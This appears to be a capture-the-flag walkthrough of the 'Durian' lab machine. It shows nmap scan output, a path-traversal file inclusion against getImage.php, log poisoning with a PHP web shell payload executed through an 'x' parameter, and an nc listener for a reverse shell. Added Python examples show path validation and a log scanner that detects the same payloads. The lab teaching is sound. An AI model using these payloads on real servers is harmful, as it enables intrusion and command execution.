| 1x4181lTv9ROJrrDGrye+Sf2MOahrh5iZ+Mq/LZKZ04MTw7iYRNGgkCIbKISmafa
| qqja3MokTaIdQBf+oCxX7JiR0Jd6YMdmux5p1/xSEuq8GnPgM8mRZiLSkZYOrwB9
| HJhCswI5T79RSJVIrpRbR7g9h1vc+yDDu/SH49g5SGyE/e2YdDRuA/JVyMUKZFBt
| wSErKwtEdoJosbega14/Vpe9uKIr
|_-----END CERTIFICATE-----
|_http-server-header: LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8000/tcp open http syn-ack ttl 64 nginx 1.14.2
|_http-title: Durian
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
8088/tcp open radan-http syn-ack ttl 64 LiteSpeed
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 200 OK
|     etag: "2fd-5f56ea13-40590;;;"
|     last-modified: Tue, 08 Sep 2020 02:18:59 GMT
|     content-type: text/html
|     content-length: 765
|     accept-ranges: bytes
|     date: Wed, 14 Sep 2022 03:29:22 GMT
|     server: LiteSpeed
|     connection: close
|     <html>
|     <body bgcolor="white">
|     <head>
|     <title>Durian</title>
|     <meta name="description" content="We Are Still Alive!">
|     <meta name="keywords" content="Hacked by Ind_C0d3r">
|     <meta name="robots" content="index, follow">
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="language" content="English">
|     </head>
|     <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
|     <style type="text/css">
|     @font-face {
|     font-family: 'Righteous', cursive;
|     font-family: 'Saira Stencil One', cursive;
|     </style>
|     <center><br><br>
|     <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
|   Socks5:
|     HTTP/1.1 400 Bad Request
|     content-type: text/html
|     cache-control: private, no-cache, max-age=0
|     pragma: no-cache
|     content-length: 1209
|     date: Wed, 14 Sep 2022 03:29:22 GMT
|     server: LiteSpeed
|     connection: close
|     <!DOCTYPE html>
|     <html style="height:100%">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <title> 400 Bad Request
|     </title></head>
|     <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
|     <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
|     style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
|     style="margin-top:20px;font-size: 30px;">Bad Request
|     </h2>
|     <p>It is not a valid request!</p>
|_    </div></div><div style="color:#f0f0
|_http-title: Durian
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed

10. Look at the /cgi-data directory on 192.168.174.138.
View the page source.
Test for file inclusion.
View the source again.
The file contents come back, so the page is vulnerable to file inclusion.
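The getImage.php page above hands a client-supplied file= value straight to the filesystem, which is why a chain of ../ reaches /etc/passwd. The following is an added example and not the target's own PHP: a Python version of the check a hardened image-serving endpoint should perform (resolve the real path, require it to stay inside the image directory, and allow only image extensions). The function names, the throwaway image directory and the probe strings are constructed for this demonstration.

```python
import os
import tempfile
from typing import Dict, Optional

# Serve only real image types; the box's getImage.php serves any file at all.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the real path of `requested` only if it is an existing image
    file inside `base_dir`. Return None for traversal, absolute paths,
    NUL bytes, symlinks that escape the directory, or other extensions."""
    if not requested or "\x00" in requested:
        return None
    # A client must never choose an absolute location.
    if os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and follows symlinks, so the comparison below
    # is made on where the name really lands, not on the string the client sent.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith, so /srv/img2 is not accepted for /srv/img.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Build a throwaway image directory (constructed) and run the traversal
    string from the walkthrough plus a few variants through the check.
    Returns {probe: accepted?}."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "durian.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0")  # constructed: just the JPEG magic bytes
        os.mkdir(os.path.join(base, "sub"))
        probes = [
            "durian.jpg",                                   # legitimate request
            "sub/../durian.jpg",                            # '..' that stays inside
            "../../../../../../../../../../../etc/passwd",  # the LFI string from the page
            "/etc/passwd",                                  # absolute path
            "durian.jpg\x00.txt",                           # NUL-byte trick
            "durian.php",                                   # disallowed extension
        ]
        return {p: resolve_image_path(base, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{'ACCEPT' if accepted else 'REJECT'}  {probe!r}")
```

The important design point is that the decision is made on the resolved path, not on the request string: "sub/../durian.jpg" is accepted because it lands inside the directory, while the page's eleven-level ../ chain is rejected because it resolves to /etc/passwd, regardless of how it was encoded.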
11. Look at the /docs directory on port 7080 of 192.168.174.157.
12. Go back to http://192.168.174.138/cgi-data/getImage.php?file=../../../../../../../../../../../etc/passwd
Use this page to read /var/log/access.log.
13. Try to read /var/log/apache2/access.log through the page; nothing comes back, so we suspect the administrator moved the log directory.
14. Capture the request with Burp Suite.
15. Request the path /var/log/durian.log/access.log; it loads successfully.
This is the access log.
16. Capture the request with Burp Suite.
17. Reload /var/log/durian.log/access.log and check the log entries; the request we just sent is there.
18.
Add <?php system($_GET['x']);?> (the x parameter carries the command to run) to the request captured in Burp Suite, then view the page contents again.
<?php system($_GET['x']);?> was executed as PHP code, so only x and y are left in the output.
19. Add an ls command and view the result.
Try a few other commands.
We have now "uploaded" a file through the log and pulled it in with file inclusion.
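The sequence in steps 13 to 19 leaves a clear trace in the web server's access log: a request whose User-Agent (or URL) carries a PHP open tag, followed by requests to getImage.php whose file= parameter walks up to the log file. The following is an added example and not part of the original write-up: a small Python scanner that reads access-log lines in the Apache/LiteSpeed combined format and flags both patterns, decoding percent-encoding first so that an encoded tag is caught as well. The log lines are constructed for the demonstration and only mirror the strings the walkthrough shows; the combined-log layout is an assumption about the target's log format.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Apache/LiteSpeed "combined" access-log layout (assumed for the target).
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A PHP open tag (<?php or <?=) has no business in any request field; it only
# becomes dangerous when the log is later fed to include(), as on this box.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Repeated '..' segments or direct references to system files in the URL.
TRAVERSAL = re.compile(r"(\.\./){2,}|/etc/passwd|/var/log/", re.IGNORECASE)


def analyse_line(line: str) -> List[str]:
    """Return the finding labels for one log line (empty if clean or unparseable)."""
    m = COMBINED_LOG.match(line)
    if not m:
        return []
    findings: List[str] = []
    for field in ("request", "referer", "agent"):
        # Decode once so %3C%3Fphp is caught as well as the literal tag.
        if PHP_TAG.search(unquote(m.group(field))):
            findings.append(f"php-tag-in-{field}")
    if TRAVERSAL.search(unquote(m.group("request"))):
        findings.append("traversal-in-request")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Scan log lines; return (line_index, findings) for every flagged line."""
    flagged = []
    for idx, line in enumerate(lines):
        findings = analyse_line(line)
        if findings:
            flagged.append((idx, findings))
    return flagged


# Constructed sample lines; only the patterns mirror the walkthrough.
SAMPLE_LOG = [
    '192.168.174.1 - - [14/Sep/2022:03:40:01 +0000] "GET /blog/ HTTP/1.1" 200 765 "-" "Mozilla/5.0"',
    '192.168.174.1 - - [14/Sep/2022:03:40:05 +0000] "GET / HTTP/1.1" 200 765 "-" "<?php system($_GET[\'x\']);?>"',
    '192.168.174.1 - - [14/Sep/2022:03:40:09 +0000] "GET /cgi-data/getImage.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1801 "-" "Mozilla/5.0"',
    '192.168.174.1 - - [14/Sep/2022:03:40:12 +0000] "GET /cgi-data/getImage.php?file=../../../../var/log/durian.log/access.log&x=ls HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
    '192.168.174.1 - - [14/Sep/2022:03:40:15 +0000] "GET /?%3C%3Fphp+echo+1%3B%3F%3E HTTP/1.1" 200 765 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(findings)}")
```

Running the scanner over the sample lines flags the poisoned User-Agent, both traversal requests against getImage.php, and the percent-encoded tag, while the plain /blog/ request passes. In a real deployment the same two regexes can be run over the live log, or over the log path the walkthrough found (/var/log/durian.log/access.log), to spot the poisoning attempt before the inclusion step is reached.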
20.
Listen on port 8888 on Kali.
nc -lvvp 8888
Send the request we just modified.
To be continued!!